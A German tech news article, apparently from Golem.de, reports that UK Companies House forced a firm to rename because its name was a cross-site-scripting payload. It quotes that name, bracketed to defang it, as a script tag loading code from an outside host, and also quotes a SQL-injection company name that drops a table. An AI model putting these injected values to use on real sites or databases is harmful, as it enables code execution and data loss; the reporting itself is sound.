• IT-Karriere:
  • Services:

HTML: Firmenname wegen Sicherheitslücke untersagt

Eine britische Firma musste ihren Namen ändern, weil er Code in Webseiten injizieren konnte.

Artikel veröffentlicht am ,
Quellcode einer Webseite
Quellcode einer Webseite (Bild: Pexels/Pixabay)

Die britische Behörde Companies House, die für das dortige Handelsregister zuständig ist, hat eine Firma gezwungen, ihren Namen zu ändern, da dieser ein Sicherheitsrisiko darstellen kann. Der Firmenname bestand aus HTML-Code, der wie ein klassischer Cross-Site-Scripting-Angriff (XSS) aufgebaut war und das Ausführen von Javascript-Code im Kontext einer Webseite ermöglichen konnte - darunter die Webseite der britischen Behörde.

Stellenmarkt
  1. emz-Hanauer GmbH & Co. KGaA, Nabburg / Oberpfalz
  2. Deutsche Gesellschaft für Internationale Zusammenarbeit (GIZ) GmbH, Eschborn

Er habe den Firmennamen nicht etwa gewählt, um die Webseite des Companies House anzugreifen, vielmehr hielt er ihn für "einen lustigen, verspielten Namen" für sein Beratungsunternehmen, erklärte der Firmengründer der britischen Zeitung Guardian. Das kann man sich bei dem ursprünglichen Firmennamen aber fast nicht vorstellen (Name zum Schutz mit Klammern):

"><[SCRIPT] SRC[=]HTTPS://MJT.XSS.HT> LTD

Wird der HTML-Code, nichts anderes ist der Firmenname, nicht ordentlich validiert und in einem HTML-Element in einer Webseite ausgegeben, wird ein Skript von der URL im Firmennamen im Kontext der Webseite ausgeführt. Das hinterlegte Skript habe nur eine harmlose Warnung ausgegeben, schreibt der Guardian. Allerdings hätte es auch zu einem späteren Zeitpunkt für Angriffe genutzt werden können.

Nun wurde die Firma in "That Company whose Name used to contain HTML Script Tags LTD" (zu Deutsch: die Firma, deren Name früher HTML-Script-Tags enthielt LTD) umbenannt. Es ist nicht das erste Mal, dass ein Firmenname Code enthält, so sollte der Firmenname "; DROP TABLE "COMPANIES";-- LTD" mittels eines SQL-Befehls Inhalte der Datenbank löschen. Allerdings wurden die Firmen laut dem Guardian nicht zu einer Namensänderung gezwungen. Auf der Webseite der Behörde Companies House werde statt des Namens schlicht "Name der Firma auf Anfrage erhältlich" ausgegeben.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed


Anzeige
Hardware-Angebote
  1. (u. a. Zotac Gaming GeForce RTX 3090 Trinity für 1.787,33€)

Tubes 16. Nov 2020 / Themenstart

Die bessere Frage lautet, seit wann nicht mehr?

MountWalker 12. Nov 2020 / Themenstart

Doch, genau das und wäre das nicht so, würdest du heute Protoindoeuropäisch* reden und...

mtr (golem.de) 10. Nov 2020 / Themenstart

Hallo, Danke für den Hinweis. Ich hatte das extra über HTML-Entities eingebaut, damit...

TurbinenBewunderer 10. Nov 2020 / Themenstart

Schon lustig. Die trauen wohl den eigenen Entwicklern nicht.

smonkey 10. Nov 2020 / Themenstart

Tatsächlich. Dann ist es zumindest common case.

Kommentieren


Folgen Sie uns
       


Xbox Series X und S - Fazit

Im Video zum Test der Xbox Series X und S zeigt Golem.de die Hardware und das Dashboard der Konsolen von Microsoft.

Xbox Series X und S - Fazit Video aufrufen
Futuristische Schwebebahn im Testbetrieb: Verkehrsmittel der Zukunft für die dritte Dimension
Futuristische Schwebebahn im Testbetrieb
Verkehrsmittel der Zukunft für die dritte Dimension

Eine Schwebebahn für die Stadt, die jeden Passagier zum Wunschziel bringt - bequem, grün, ohne Stau und vielleicht sogar kostenlos. Ist das realistisch?
Ein Bericht von Werner Pluta

  1. ÖPNV Infraserv Höchst baut Wasserstofftankstelle für Züge

Astronomie: Arecibo wird abgerissen
Astronomie
Arecibo wird abgerissen

Das weltberühmte Radioteleskop ist nicht mehr zu retten. Reparaturarbeiten wären lebensgefährlich.

  1. Astronomie Zweites Kabel von Arecibo-Radioteleskop kaputt
  2. Die Zukunft des Universums Wie alles endet
  3. Astronomie Gibt es Leben auf der Venus?

Covid-19: So funktioniert die Corona-Vorhersage am FZ Jülich
Covid-19
So funktioniert die Corona-Vorhersage am FZ Jülich

Das Forschungszentrum Jülich hat ein Vorhersagetool für Corona-Neuinfektionen programmiert. Projektleiter Gordon Pipa hat uns erklärt, wie es funktioniert.
Ein Bericht von Boris Mayer

  1. Top 500 Deutscher Supercomputer unter den ersten zehn
  2. Hochleistungsrechner Berlin und sieben weitere Städte bekommen Millionenförderung
  3. Cineca Leonardo Nvidias A100 befeuert 10-Exaflops-AI-Supercomputer

    •  /